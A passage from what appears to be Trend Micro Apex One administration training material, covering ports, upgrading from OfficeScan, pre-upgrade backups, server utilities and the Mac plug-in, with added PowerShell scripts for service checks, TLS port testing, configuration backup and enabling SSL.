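    @{ Name = 'Apex One Active Directory Integration Service';  Optional = $false }
    @{ Name = 'Apex One Deep Discovery Service';                Optional = $false }
    @{ Name = 'Apex One Log Receiver Service';                  Optional = $false }
    @{ Name = 'Apex One Plug-in Manager';                       Optional = $false }
    @{ Name = 'Trend Micro Local Web Classification Server';    Optional = $false }
    @{ Name = 'Trend Micro Smart Protection Query Handler';     Optional = $false }
    @{ Name = 'Trend Micro Advanced Threat Assessment Service'; Optional = $false }
    @{ Name = 'Trend Micro Smart Protection Server';            Optional = $true }
    @{ Name = 'Trend Micro Endpoint Sensor Service';            Optional = $true }
    @{ Name = 'Trend Micro Application Control Service';        Optional = $true }
    @{ Name = 'Trend Micro Vulnerability Protection Service';   Optional = $true }
)

function Get-ApexOneServiceStatus {
    # One row per expected service. Problem is True when a required service is missing
    # or when any installed service (required or optional) is not running.
    $installed = Get-Service -DisplayName 'Apex One*', 'Trend Micro*' -ErrorAction SilentlyContinue
    foreach ($exp in $ExpectedServices) {
        $svc = $installed | Where-Object { $_.DisplayName -like "$($exp.Name)*" } | Select-Object -First 1
        $status = if ($svc) { [string]$svc.Status } else { 'NotInstalled' }
        [pscustomobject]@{
            Service  = $exp.Name
            Optional = $exp.Optional
            Found    = [bool]$svc
            Status   = $status
            Problem  = ((-not $exp.Optional) -and (-not $svc)) -or ($svc -and $svc.Status -ne 'Running')
        }
    }
}

function Get-ApexOneInstallLogIssues {
    # Returns the last $Last log lines that mention an error or failure, with line numbers.
    param([string]$LogPath = (Join-Path $env:windir 'ofcmas.log'), [int]$Last = 20)
    if (-not (Test-Path -LiteralPath $LogPath)) { return "Installation log not found: $LogPath" }
    Select-String -LiteralPath $LogPath -Pattern 'error|fail' |
        Select-Object -Last $Last |
        ForEach-Object { "line $($_.LineNumber): $($_.Line.Trim())" }
}

# Usage: review every row with Problem = True, then the flagged log lines.
Get-ApexOneServiceStatus | Format-Table -AutoSize
Get-ApexOneInstallLogIssues
```

A service that is installed but stopped is flagged whether it is required or optional, because an optional service is only installed when its feature was enabled and is therefore expected to run.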

Ports and Protocols to Allow


Multiple ports must be allowed through an organization’s firewall to enable Apex One to operate.

Server Port (HTTP 8080, HTTPS 4343)
The web server listening port for the Apex One virtual directory. The HTTP or HTTPS ports are used
by the Agents to download pattern file updates, and upload logs, quarantined files and status
information. The HTTPS port is also used by Administrators to connect to the Apex One Web
Management console. These settings are stored in the Master_DomainPort parameter in the
\PCCSRV\ofcscan.ini file.

Agent Port (TCP, random 5-digit port number)
Configured during installation. Security Agent listening port where CGI commands such as update
notifications and configuration changes are received from the Apex One server. Update Agent hosts
also use the Agent Port to reply to download requests for scan engine and pattern file updates
pulled by peer Security Agents. These settings are stored in the Client_LocalServer_Port parameter
in the \PCCSRV\ofcscan.ini file.

Integrated Smart Protection Server (IIS) (HTTP 8080, HTTPS 4343)
Used to receive queries from Security Agents as part of cloud technology. When using the Apex One
virtual site, the port is 8080 if the Apex One Web Management console uses HTTP. If HTTPS
functionality is used, the port is 4343.

Integrated Web Reputation Service (IIS) (HTTP 8080)
Local Web Reputation Service uses this port to receive queries from Security Agents as part of Web
Reputation checks.

Apex Central (HTTP 80, HTTPS 443)
Used for notification for updates from Apex Central as well as sending back status/virus events
from Apex One Server to Apex Central.

NetBIOS for Remote Install (TCP/UDP 137, 139, 445)
Used when installing Agents by Remote Install and when Agents send quarantined files to the Server
using the UNC path.

LDAP for Active Directory (LDAP 389)
Used when the Security Compliance function retrieves Active Directory information.

License Server (TCP/UDP 80, 60162, 60163)
Used to access the Trend Micro License Server.

Edge Relay Server (HTTPS 443)
Used for Security Agent to Edge Relay Server and Edge Relay Server to Apex One Server
communication.

Unmanaged Endpoint (TCP 135)
Used to check the endpoint connectivity. When connection is not established, Apex One
immediately treats the endpoint as unreachable. The default port number is 135. Enabling this
setting speeds up the query. When connection to endpoints cannot be established, the Apex One
server no longer needs to perform all the other connection verification tasks before treating
endpoints as unreachable.

Upgrading to Apex One


Apex One is the new name for OfficeScan; upgrading OfficeScan 11 SP1, XG and XG SP1 will update your
installation to Apex One and convert OfficeScan Agents to new Apex One Security Agents.

Upgrading OfficeScan as a Service to Apex One as a Service


Implementations of OfficeScan as a Service will be automatically upgraded in-place based on Trend
Micro’s upgrade schedule. This will not require any action on the part of the administrator. Once the
account is upgraded to Apex One as a Service, the Security Agents will also be upgraded
automatically. Automatic Agent updating can be disabled if the administrator would like more
control as to when the Security Agents are upgraded. No Apex One features will be available until
the Security Agents are upgraded.

Upgrading OfficeScan to Apex One (on-premise)


OfficeScan 11 SP1, XG and XG SP1 can be upgraded directly to Apex One. If using a previous version of
OfficeScan (11, 10.6 or 10.5), upgrade the installation to OfficeScan XG SP1, then upgrade to Apex
One.

Note: A full back-up should be completed before running the upgrade, in case of any problems.

Server upgrade options can be classified into the following modes:

In-place Migration

This mode installs Apex One over an existing OfficeScan Server, and the installation program
handles all the relevant changes.

OfficeScan XG SP1 introduced the use of HTTPS for Server/Agent communication. If upgrading
to Apex One from OfficeScan 11 SP1 or XG, the setup will prompt you to accept the use of HTTPS.

Note: Apex One moves the communication between Agents and the Server to HTTPS. By moving to
HTTPS, the communication port on the server will also change from the HTTP port (default of
8080) to the HTTPS port (the same as the Web Management console, default of 4343).

Some environments may encounter HTTPS communication issues due to various factors (for
example, inconsistent SSL/TLS environments, firewalls blocking the HTTPS port, etc.). This can
result in agents showing offline, failing to upgrade, and not uploading logs or quarantined files.
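The following PowerShell script is an added example and not part of the Trend Micro course material. It serves both the Ports and Protocols table and the note above on moving Agent/Server communication to HTTPS: it reads Master_DomainPort and Client_LocalServer_Port from ofcscan.ini, confirms that the server port has a listener, and performs a TLS handshake against the HTTPS port so that a firewall block (the TCP connection fails) can be told apart from a TLS mismatch (the TCP connection succeeds but the handshake fails). It assumes the ini keys appear as plain Key=Value lines; the ofcscan.ini path and the server name apexone.example.local in the usage comments are placeholders to replace.

```powershell
# Added example for this course text; it is not a Trend Micro tool.
# Reads the two port settings the ports table names in ofcscan.ini, confirms the
# Apex One Server is listening on its server port, and performs a TLS handshake on
# the HTTPS port to separate firewall blocks from TLS mismatches.
# Assumptions (not from the course): the ini keys are plain "Key=Value" lines and
# the path to ofcscan.ini is supplied by the caller.

function Get-IniValue {
    # Returns the value of the first "Key=Value" line for $Key, regardless of section.
    param([Parameter(Mandatory)][string]$Path, [Parameter(Mandatory)][string]$Key)
    $pattern = '^\s*{0}\s*=\s*(\S+)' -f [regex]::Escape($Key)
    $hit = Select-String -LiteralPath $Path -Pattern $pattern | Select-Object -First 1
    if ($hit) { $hit.Matches[0].Groups[1].Value }
}

function Get-ApexOnePorts {
    param([Parameter(Mandatory)][string]$OfcscanIni)
    [pscustomobject]@{
        ServerPort = [int](Get-IniValue -Path $OfcscanIni -Key 'Master_DomainPort')       # 8080 HTTP / 4343 HTTPS
        AgentPort  = [int](Get-IniValue -Path $OfcscanIni -Key 'Client_LocalServer_Port') # random 5-digit port
    }
}

function Test-ApexOneServerListener {
    # Run on the Apex One Server: is a process bound to the server port?
    param([Parameter(Mandatory)][int]$Port)
    $conn = Get-NetTCPConnection -LocalPort $Port -State Listen -ErrorAction SilentlyContinue
    [pscustomobject]@{ Port = $Port; Listening = [bool]$conn
                       OwningPid = ($conn | Select-Object -First 1).OwningProcess }
}

function Test-TlsHandshake {
    # Run from an Agent host (or the server itself) against the HTTPS port.
    # TcpConnected = False points at a firewall; TcpConnected = True with
    # TlsHandshake = False points at a TLS mismatch. Chain errors are reported in
    # ChainTrusted rather than treated as fatal, because the handshake itself is
    # what Agent/Server communication depends on.
    param([Parameter(Mandatory)][string]$ComputerName, [int]$Port = 4343)
    $result = [ordered]@{ Target = "${ComputerName}:$Port"; TcpConnected = $false; TlsHandshake = $false
                          Protocol = $null; CertSubject = $null; CertExpires = $null
                          ChainTrusted = $null; Error = $null }
    $tcp = $null; $ssl = $null
    try {
        $tcp = New-Object System.Net.Sockets.TcpClient($ComputerName, $Port)
        $result.TcpConnected = $true
        # Accept any certificate for the handshake; trust is evaluated separately below.
        $acceptAny = [System.Net.Security.RemoteCertificateValidationCallback]{ $true }
        $ssl = New-Object System.Net.Security.SslStream($tcp.GetStream(), $false, $acceptAny)
        $ssl.AuthenticateAsClient($ComputerName)
        $result.TlsHandshake = $true
        $result.Protocol = [string]$ssl.SslProtocol
        $cert = [System.Security.Cryptography.X509Certificates.X509Certificate2]$ssl.RemoteCertificate
        $result.CertSubject = $cert.Subject
        $result.CertExpires = $cert.NotAfter
        $result.ChainTrusted = $cert.Verify()   # False for a self-issued server certificate
    } catch {
        $result.Error = $_.Exception.Message
    } finally {
        if ($ssl) { $ssl.Close() }
        if ($tcp) { $tcp.Close() }
    }
    [pscustomobject]$result
}

# Usage (on the server): confirm the server port from ofcscan.ini has a listener.
# $ports = Get-ApexOnePorts -OfcscanIni '<path-to>\PCCSRV\ofcscan.ini'
# Test-ApexOneServerListener -Port $ports.ServerPort
# Usage (from an Agent host): verify the HTTPS port completes a TLS handshake.
# Test-TlsHandshake -ComputerName 'apexone.example.local' -Port 4343
```

Running Test-TlsHandshake from several Agent hosts with different Windows versions is a quick way to find the inconsistent SSL/TLS environments the note describes: the Protocol column shows which protocol version each host negotiated, and an Error with TcpConnected = True identifies hosts whose handshake fails.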

Depending on the permissions set in OfficeScan, Agents can be automatically upgraded to Apex
One Security Agents as part of the upgrade process. This could introduce load issues in the
environment if all Agents attempt an upgrade all at once. If this is a concern, disable the
automatic upgrading of Agents in OfficeScan before launching the upgrade process.


A backup of the server information is recommended before upgrading to Apex One. Click Yes to
allow the setup application to perform a backup of the server data.

Apex One integrates Endpoint Sensor capabilities and this optional component can be installed
during the upgrade, if required. Certain database conditions apply if this option is selected.

Apex One requires a Microsoft SQL Server database. If upgrading from an installation of
OfficeScan 11 SP1, XG or XG SP1 using the built-in Codebase database, you will be prompted to
provide details of an SQL Server instance. If an installation of SQL Server is not available, SQL
Server Express can be installed as part of the setup.

To plan the deployment of Security Agents, sizing details of the Agent deployment packages are
displayed.


If the option to use SQL Server Express was enabled, the database is installed and the Codebase
tables are transitioned.

If Control Manager was used for policy management, it can also be upgraded to Apex Central.

New Server

This mode installs Apex One on a separate, new server. Policies are exported from the existing
OfficeScan installation, which are then imported into the new Apex One installation. OfficeScan
Agents from the existing OfficeScan installation can then be moved to the new Apex One Server.

Best Practice: Since the new server installation provides more flexibility in determining when Agents
are moved and also allows you to transition to different hardware or operating
systems easily, this method is the recommended upgrade method.

Upgrading OfficeScan (on-premise) to Apex One as a Service


For on-premise installations of OfficeScan XG that do not use Control Manager, the upgrade to a
SaaS implementation is fairly straightforward. An Apex One SaaS account is created through the
licensing portal and an instance of Apex One is provisioned. Export your policies from the
on-premise OfficeScan XG server and import them into Apex One SaaS. Then, from the Web
Management console in OfficeScan XG, move the Agents to the new SaaS installation, which will
trigger an upgrade of the Security Agents. Finally, the original OfficeScan XG Server can be
decommissioned.


For on-premise installations of OfficeScan XG that use Control Manager for policy management, where
you wish to retire both the OfficeScan XG and Control Manager Servers, the upgrade to a SaaS
implementation is slightly different. An Apex One SaaS account is created through the licensing
portal and an instance of Apex One is provisioned. Export your policies from Control Manager and
import them into Apex One SaaS. Then, from the Web Management console in OfficeScan XG,
move the Agents to the new SaaS installation, which will trigger an upgrade of the Security Agents.
The original OfficeScan XG Server and Control Manager can be decommissioned. Keep in mind that
an on-premise installation of Apex Central is required if using Connected Threat Defense.

For on-premise installations of OfficeScan XG that use Control Manager for policy management, where
you wish to retire OfficeScan XG but keep the Control Manager Server, the upgrade to a SaaS
implementation is as follows. An Apex One SaaS account is created through the licensing portal and
an instance of Apex One is provisioned. Connect Apex One SaaS to Control Manager and, from the
Web Management console in OfficeScan XG, move the Agents to the new SaaS installation, which will
trigger an upgrade of the Security Agents. The original OfficeScan XG Server can be
decommissioned.

Upgrading OfficeScan Agents to Apex One Security Agents


OfficeScan Agents are automatically upgraded to Apex One Security Agents when the Server is
upgraded. To delay the upgrade of Agents, turn off the Agent auto-update feature in OfficeScan XG
before upgrading. This will be important in situations where bandwidth is limited.

In OfficeScan, access Privileges and Other Settings and set the OfficeScan agents only update the
following components item to Pattern files only. Click Apply to All Agents.

When you decide to proceed with upgrading agents, in the new Apex One server, set this value to All
components (including hotfixes and the Agent program). When the OfficeScan Agent receives this
new setting, it will upgrade to an Apex One Security Agent.


Upgrading to the Integrated Agent

In OfficeScan XG, Endpoint Sensor, Application Control, and Vulnerability Protection required a
separate Agent on the endpoint. In Apex One, this functionality is now integrated in Apex One
Server and Security Agent.

When the Endpoint Sensor, Application Control, and Vulnerability Protection features are enabled
through policy in Apex Central, and the policy is deployed to the Agents, the standalone Agent
for each feature is removed and the corresponding new Apex One service is launched.

Pre-Upgrade Backup Considerations


It is important to back up the OfficeScan database and important configuration files before
upgrading to the Apex One Server. If upgrading a version of OfficeScan using the built-in Codebase
database, it will be upgraded to Microsoft SQL Server as part of the process, using either an existing
instance of SQL Server or a new installation of SQL Server Express. Back up the OfficeScan Server
database to a location outside the OfficeScan program directory.
• Back up the database from the OfficeScan Web Management console by going to
Administration > Database Backup. If you have already transitioned to SQL with OfficeScan,
use the SQL tools to back up the database.
• Manually back up the following files and folders found in the ...\PCCSRV folder:
- ofcscan.ini: Contains global client settings
- ous.ini: Contains the update source table for antivirus component deployment
- Private folder: Contains firewall and update source settings
- ...\Web\tmOPP folder: Contains Outbreak Prevention settings
- ...\Pccnt\Common\OfcPfw*.dat: Contains firewall settings
- ...\Download\OfcPfw*.dat: Contains firewall deployment settings
- ...\Log folder: Contains system events and the connection verification logs
- ...\Virus folder: Contains quarantined files
- ...\HTTPDB folder: Contains the OfficeScan database, if using Codebase
• Back up the existing key and certificate using the Authentication Certificate Manager Tool
(CertificateManager.exe).
After the new installation completes, import the backed-up key and certificate to allow
communication authentication between the Apex One Server and Security Agents to
continue uninterrupted. If you create a new certificate during Server installation, Security
Agents cannot authenticate Server communication because they would still be using the old
certificate.
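A script that copies the files and folders listed above to a location outside the program directory and records file hashes for later verification, as an added example (not Trend Micro code). The PCCSRV and destination paths are placeholders; the database backup and the CertificateManager.exe key/certificate export remain separate steps.

```powershell
# Added example, not Trend Micro code: copy the pre-upgrade backup items listed in the
# text to a backup location outside the OfficeScan program directory.
# Assumptions: $PccSrv is the OfficeScan PCCSRV folder and $Dest a folder outside it
# (both placeholders). The database and certificate backups are done separately.
param(
    [string]$PccSrv = 'C:\Program Files (x86)\Trend Micro\OfficeScan\PCCSRV',  # placeholder
    [string]$Dest   = 'D:\OfficeScanBackup'                                     # placeholder
)
$ErrorActionPreference = 'Stop'

# Refuse a destination inside PCCSRV: the upgrade rewrites that tree.
$srcFull  = [System.IO.Path]::GetFullPath($PccSrv)
$destFull = [System.IO.Path]::GetFullPath($Dest)
if ($destFull.StartsWith($srcFull, [System.StringComparison]::OrdinalIgnoreCase)) {
    throw "Backup destination must be outside $srcFull"
}

$stamp  = Get-Date -Format 'yyyyMMdd-HHmmss'
$target = Join-Path $destFull "PCCSRV-$stamp"
New-Item -ItemType Directory -Path $target | Out-Null

# Items from the pre-upgrade list, relative to PCCSRV. Wildcards cover OfcPfw*.dat.
$items = @(
    'ofcscan.ini',              # global client settings
    'ous.ini',                  # update source table
    'Private',                  # firewall and update source settings
    'Web\tmOPP',                # Outbreak Prevention settings
    'Pccnt\Common\OfcPfw*.dat', # firewall settings
    'Download\OfcPfw*.dat',     # firewall deployment settings
    'Log',                      # system events and connection verification logs
    'Virus',                    # quarantined files (stored encrypted)
    'HTTPDB'                    # Codebase database; absent once SQL is in use
)

$report = foreach ($rel in $items) {
    $src    = Join-Path $srcFull $rel
    $parent = Split-Path $rel -Parent
    $dst    = if ($parent) { Join-Path $target $parent } else { $target }
    if (-not (Test-Path $src)) {
        # Not an error for every item, e.g. HTTPDB after the SQL transition
        [pscustomobject]@{ Item = $rel; Status = 'missing' }
        continue
    }
    if (-not (Test-Path $dst)) { New-Item -ItemType Directory -Path $dst | Out-Null }
    Copy-Item -Path $src -Destination $dst -Recurse -Force
    [pscustomobject]@{ Item = $rel; Status = 'copied' }
}

# Record SHA-256 hashes so the backup can be verified before a restore.
Get-ChildItem -Path $target -Recurse -File |
    Get-FileHash -Algorithm SHA256 |
    Select-Object Hash, Path |
    Export-Csv -Path (Join-Path $target 'manifest-sha256.csv') -NoTypeInformation

$report | Format-Table -AutoSize
"Backup written to $target"
```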


Migrating Apex One Servers


Apex One Administrators can use the Server Migration Tool to copy settings from previous OfficeScan
versions to the current version.

This tool exports the following settings from OfficeScan 10.0 and later, and imports the settings to the
current version of Apex One:
• Domain structures
• Additional service settings *
• Manual Scan settings *
• Spyware/Grayware approved list *
• Scheduled Scan settings *
• Global Agent settings
• Real-time Scan settings *
• Endpoint location
• Scan Now settings *
• Firewall policies and profiles
• Web Reputation settings *
• Smart Protection sources
• Approved URL list *
• Server update schedule
• Behavior Monitoring settings *
• Agent update source and schedule
• Device Control settings *
• Notifications
• Data Loss Prevention settings *
• Proxy settings
• Privileges and other settings *
• OfficeScan_Agent_Port and Client_LocalServer_Port in the ofcscan.ini file

Note: Settings with an asterisk (*) retain the configurations at both the root and domain level. The tool
does not back up the Security Agent listings of the Apex One Server, only the domain structures.
The tool only migrates features that are available on the older server version. For features that
are not available on the older server, the Apex One Server applies the default settings.


1 From the Apex One Web Management console, go to Administration > Settings > Server
Migration and click Download Apex One Settings Export Tool. Save the
ApexOneSettingsExportTool.zip file to the hard drive.

Alternately, navigate to the following folder on the Apex One Server computer:
...\PCCSRV\Admin\Utility\PolicyExportTool
2 Copy the ApexOneSettingsExportTool.zip file or the ...\PolicyExportTool folder to the
source OfficeScan server computer.
3 Double-click OfficeScanSettingsExportTool.exe to start the OfficeScan Settings Export
Tool.
4 Copy the resulting Server_Settings_Migration.zip package to a location that the
destination Apex One Server can access.
5 To import the settings to the destination Apex One server, go to Administration > Settings >
Server Migration and click Import Settings.

6 Locate the Apex One_Server_Migration.zip package and click Open.


7 Verify that the server contains all the previous Apex One version settings.

The Server Migration Tool that is packaged with the current Apex One release must be used to export
the settings from the previous OfficeScan version.


Server Service Setup Utility


The Server Service Setup Utility allows administrators to perform certain functions through a Command
Line interface.

Open the Windows Command Prompt on the Apex One Server and navigate to the following folder:
...\PCCSRV\

Type the following command with the necessary parameters:


svrsvcsetup.exe [parameter]

A partial list of parameters is provided in this table.

Parameter        Description
/?               Displays parameter information for the command.
-install         Installs and starts the Apex One Master Service, and creates virtual
                 directories. This parameter will:
                 • Check dependencies and then stop related IIS services
                 • Stop the IIS service
                 • Delete the previous virtual key in the IIS metabase
                 • Read virtual directory information (VIRDIR_INFO) from the uninstall
                   configuration file (ofuninst.ini)
                 • Write information to the IIS metabase
                 • Restart IIS and dependencies
-uninstall       Uninstalls Apex One-related services but does not remove configuration files
                 or the Apex One database. The Apex One Master Service and Web server
                 dependencies are removed. This parameter will:
                 • Check dependencies and then stop IIS-related services
                 • Delete virtual directories ([VIRDIR_INFO]) information from the uninstall
                   log file (ofuninst.ini)
                 • Restart IIS
-uninstall_upg   Backs up settings and files for upgrade scenarios before removing Apex One.
-enablessl       Enables SSL on the selected Web server. This command will:
                 • Create a new private key in ...\PCCSRV\Private\certificate\privkey.pem
                 • Blank the main login screen
                 • Change the settings in the file to reflect these new keys
                 • Generate ...\PCCSRV\Result.log if the command is successful. The
                   content of the log is:
                   [RESULT]
                   Success=0
-migratecmAgent  Migrates the Apex One Server from the TMI-based Security Agent for Apex
                 Central to the MCP-based Agent:
                 • MigrateTMICfgToMCP
                 • TryToUninstallTMIAgent
-EnableIPv6      Enables IPv6 functionalities in the Apex One Server, and subsequently deploys
                 IPv6 to Agents.

More information on svrsvcsetup.exe can be found in the following document in the Trend Micro
Knowledge Base:

http://esupport.trendmicro.com/solution/en-us/1036488.aspx
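Running -enablessl and confirming the outcome from Result.log, as described in the table above, as an added example (not Trend Micro code). The PCCSRV path is a placeholder and the function Read-SvrSvcResult is this example's own; it relies only on the [RESULT] / Success=0 format the table documents.

```powershell
# Added example, not Trend Micro code: run svrsvcsetup.exe -enablessl from the PCCSRV
# folder and confirm success from Result.log instead of trusting the exit code alone.
# Assumptions: $PccSrv is a placeholder path; the log format is the one the table shows.
# Note that -enablessl creates a new private key, so run it deliberately.
param([string]$PccSrv = 'C:\Program Files (x86)\Trend Micro\OfficeScan\PCCSRV')  # placeholder

function Read-SvrSvcResult {
    # Parses an INI-style Result.log; returns $true only for Success=0 under [RESULT].
    param([string]$Path)
    if (-not (Test-Path $Path)) { return $false }
    $section = ''
    foreach ($line in Get-Content $Path) {
        $t = $line.Trim()
        if ($t -match '^\[(.+)\]$') { $section = $Matches[1]; continue }
        if ($section -eq 'RESULT' -and $t -match '^Success\s*=\s*(\d+)$') {
            return ([int]$Matches[1] -eq 0)
        }
    }
    return $false
}

$resultLog = Join-Path $PccSrv 'Result.log'
# Remove a stale log so an earlier success cannot be mistaken for this run's result.
Remove-Item $resultLog -ErrorAction SilentlyContinue

$proc = Start-Process -FilePath (Join-Path $PccSrv 'svrsvcsetup.exe') `
        -ArgumentList '-enablessl' -WorkingDirectory $PccSrv -Wait -PassThru -NoNewWindow

$keyPath = Join-Path $PccSrv 'Private\certificate\privkey.pem'
if (Read-SvrSvcResult $resultLog) {
    "SSL enabled (exit code $($proc.ExitCode)); private key present: $(Test-Path $keyPath)"
} else {
    Write-Warning "No Success=0 found in $resultLog (exit code $($proc.ExitCode)); check IIS before proceeding."
}
```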

Apex One (Mac)


Apex One (Mac) (previously known as Trend Micro Security for Mac) protects Mac endpoints against
security risks, blended threats, and platform independent web-based attacks. As with Apex One for
Windows, a Security Agent is installed on the Mac endpoint and reports its security status back to the
Apex One (Mac) Server. The Server manages all the endpoints and administrators can easily configure
security policies and deploy updates to every security agent through a separate Web Management
console. Apex One (Mac) policies and endpoints can also be managed through Apex Central.

Apex One (Mac) maintains all the capabilities of Trend Micro Security for Mac but introduces some new
features including:
• Updated Web Management console: The new Apex One (Mac) Server Web Management console
makes it easier to manage and provides administrators with a modern interface experience.
• Predictive Machine Learning support: Apex One (Mac) adds a new engine to detect emerging,
unknown security risks. It performs behavioral analysis on unknown, low-prevalence processes
to determine if an emerging threat is attempting to infect the network.
• Smart Scan enhancements: Apex One (Mac) adds a new pattern called Mac Heuristic Pattern.
This new pattern is used by Smart Scan to identify malware specifically targeting Mac platforms.
• Device Control: Apex One (Mac) has added Device control to allow administrators to limit usage
on external devices.
• Scan Mach-O File Type: Apex One (Mac) introduces a new scan method called Scan Mach-O File
Type. This method aims to improve the scan performance on Mac endpoints and is available for
Full Scan and Manual Scans.
• Trusted Program list: Trusted Program List allows Security Agents to skip scanning of trusted
processes to improve performance during scanning on endpoints. This list now includes common
Mac applications.
• Integrated Endpoint Sensor: Metadata from Mac endpoints is collected by the integrated
Endpoint Sensor and enables Preliminary Assessments on these endpoints.


Installing the Apex One (Mac) Plug-In


Apex One (Mac) is installed through the plug-in interface in Apex One. A separate Web Management
console will become available to manage settings and configuration of the Mac Security Agents.

Note: The Microsoft .NET Framework 3.51 is required to install the Apex One (Mac) plug-in.

1 In the Apex One Web Management console, click the Plug-ins menu. In the Apex One (Mac)
section, click Download.

2 Confirm the download of Apex One (Mac) and click OK to proceed. A progress bar displays the
status of the download.

3 After the download is complete, click Install Now, and accept the license agreement.


4 Once installed, click Manage Program.

5 Type the Apex One (Mac) Activation Code and click Save.

Apex One (Mac) Web Management Console


To access the Apex One (Mac) console, open the Apex One Web Management console and click
Plug-ins. In the Apex One (Mac) section, click Manage Program.


Apex One Plug-Ins


Apex One includes a framework called Plug-in Manager that integrates new solutions into the existing
Apex One on-premise environment. Plug-in Manager delivers the following:
• Native Product Features: Some native Apex One features are licensed separately and activated
through Plug-in Manager. In this release, two features fall under this category, namely, Trend
Micro Virtual Desktop Support and Apex One Data Protection.
• Plug-in programs: Plug-in programs are not part of the Apex One program. The plug-in programs
have separate licenses and management consoles. Access the management consoles from
within the Apex One Web Management console. Examples of plug-in programs are Trend Micro
Apex One Toolbox, Apex One (Mac) and some of the Deployment Tools.
• Dashboard tabs and widgets: The Apex One Dashboard screen requires Plug-in Manager to
display the tabs and widgets used to monitor the Apex One Server and Agent protection status.

Plug-in Manager delivers the following plug-ins for Apex One:

Apex One Data Protection


Apex One Data Protection is designed to minimize the risk of information loss and improve visibility
of data usage patterns and risky business processes so your private information remains secure.
You gain broad coverage, high performance, and deployment flexibility needed to comply with
regulatory mandates.

Trend Micro Endpoint Encryption Deployment Tool


Trend Micro Endpoint Encryption ensures end-to-end data protection by providing FIPS 140-2 full
disk encryption for data at rest and file, folder, and removable media encryption for data in motion.
The Trend Micro Endpoint Encryption Deployment Tool provides a framework to centrally manage,
deploy, and execute Agent installation/uninstallation commands to endpoints managed by the Apex
One server. The tool leverages the Apex One server client tree hierarchy to remotely execute
deployment tasks.

Before attempting to install Trend Micro Endpoint Encryption, ensure that the environment meets all
system requirements.

Apex One (Mac)


Apex One (Mac) (previously known as Trend Micro Security for Mac) protects Mac endpoints against
security risks, blended threats, and platform independent web-based attacks.

Trend Micro Virtual Desktop Support


Optimize virtual desktop protection by using Trend Micro Virtual Desktop Support. This feature
regulates tasks on Apex One clients residing in a single virtual server.


Trend Micro Apex One Toolbox


The Apex One Toolbox functions as a framework that manages, deploys, executes and consolidates
logs for a variety of standalone Trend Micro tools. The Toolbox leverages the Agent tree hierarchy
of the Apex One Server to remotely execute these tools on Security Agents managed by the Apex
One Server.

Apex One Utilities


Apex One includes a collection of stand-alone utilities and tools to simplify certain server tasks. These
utilities and tools can also be accessed from the following folder on the Apex One Server:
...\PCCSRV\admin\Utility

Authentication Certificate Manager


The Authentication Certificate Manager tool is used to manage Trend Micro certificates and keys.

This utility (CertificateManager.exe) is located in the following folder on the Apex One Server:
...\PCCSRV\admin\Utility\CertificateManager

Agent Packager
The Agent Packager tool creates an installation package that you can send to users using
conventional media such as CD-ROM. Users run the package on the Agent endpoint to install or
upgrade the Security Agent and update components.

Agent Packager is especially useful when deploying the Security Agent or components to endpoints
in low-bandwidth remote offices. Security Agents installed using Agent Packager report to the
server where the package was created.

This utility (ClnPack.exe) is located in the following folder on the Apex One Server:
...\PCCSRV\admin\Utility\ClientPackager

Cisco Trust Agent


The Cisco Trust Agent (CTA) enables the Apex One client to report antivirus information to Cisco
ACS.

The CTA packages are located in the following folder on the Apex One Server:
...\PCCSRV\admin\Utility\CTA


Domains Schedule Update


The update schedule configured in automatic client updates only applies to clients with scheduled
update privileges. For other clients, you can set a separate update schedule. To do this, you will need
to configure a schedule by client tree domains. All clients belonging to the domain will apply the
schedule.

This utility (dsu_convert.exe) is located in the following folder on the Apex One Server:
...\PCCSRV\admin\Utility\DomainScheduleUpdate

Edge Relay Server Installer


The Apex One Edge Relay Server provides administrators with visibility and increased protection of
endpoints that users take outside of the company's intranet.

The installation program for the Edge Relay Server (setup.exe) is located in the following folder on
the Apex One Server:
...\PCCSRV\admin\Utility\EdgeServer

Gateway Settings Importer


Apex One checks the endpoint's location to determine the Web Reputation policy to use and the
Smart Protection source to which to connect. One of the ways Apex One identifies the location is by
checking the endpoint's gateway IP address and MAC address.

Configure the gateway settings on the Endpoint Location screen or use the Gateway Settings
Importer tool to import a list of gateway settings to the Endpoint Location screen.

The Gateway Settings Importer tool (GSImporter.exe) is located in the following folder on the
Apex One Server:
...\PCCSRV\admin\Utility\GatewaySettingsImporter

Image Setup
Disk imaging technology allows you to create an image of the Security Agent using disk imaging
software and make clones of it on other computers on the network. Each Security Agent installation
needs a Globally Unique Identifier (GUID) so that the server can identify Agents individually. Use the
Apex One program called ImgSetup.exe to create a different GUID for each of the clones.

This utility (ImgSetup.exe) is located in the following folder on the Apex One Server:
...\PCCSRV\admin\Utility\ImgSetup


Agent Mover
If you have more than one Apex One server on the network, use the Agent Mover tool to transfer
Security Agents from one Apex One server to another. This is especially useful after adding a new
Apex One server to the network and you want to transfer existing Security Agents to the new server.

This utility (IpXfer.exe or IpXfer_x64.exe) is located in the following folder on the Apex One
Server:
...\PCCSRV\admin\Utility\IpXfer

Integrated Service Package


This folder contains installers for the integrated Application Control, Vulnerability Protection,
Advanced Threat Assessment and Endpoint Sensor components.

These installers are located in the following folder on the Apex One Server:
...\PCCSRV\admin\Utility\iServicePackage

Integrated Smart Protection Server Tool


The Trend Micro Integrated Smart Protection Tool helps administrators install or uninstall an
Integrated Smart Protection Server after the Apex One server installation is completed.

This Integrated Smart Protection Tool Installer program (ISPSInstaller.exe) is located in the
following folder on the Apex One Server:
...\PCCSRV\admin\Utility\ISPSInstaller

Device List Tool


Run the Device List Tool locally on each endpoint to query external devices connected to the
endpoint. The tool scans an endpoint for external devices and then displays device information in a
browser window. You can then use the information when configuring device settings for Data Loss
Prevention and Device Control.

This utility (listDeviceInfo.exe) is located in the following folder on the Apex One Server:
...\PCCSRV\admin\Utility\ListDeviceInfo

Message Queue
This utility is used to interact with the Windows Message Queuing service.

This utility (mqtool.exe) is located in the following folder on the Apex One Server:
...\PCCSRV\admin\Utility\MessageQueue


Console Password Reset Tool


This utility can reset the Apex One Web Management console password in situations where the
password has been lost or the previous administrator has left the company without providing the
password to the new staff.

This utility (OSCEResetPW.exe) is located in the following folder on the Apex One Server:
...\PCCSRV\admin\Utility\OSCEResetPW

Plug-in Manager Installer


This utility installs the Apex One Plug-in Manager.

This utility (PLMSetup.exe) is located in the following folder on the Apex One Server:
...\PCCSRV\admin\Utility\PLM

Apex One Settings Export Tool


This Apex One Settings Export Tool allows administrators to copy Apex One settings from previous
Apex One versions to the current version.

This utility (ApexOneSettingsExportTool.exe) is located in the following folder on the Apex
One Server:
...\PCCSRV\admin\Utility\PolicyExportTool

Apex One Server Migration Tool


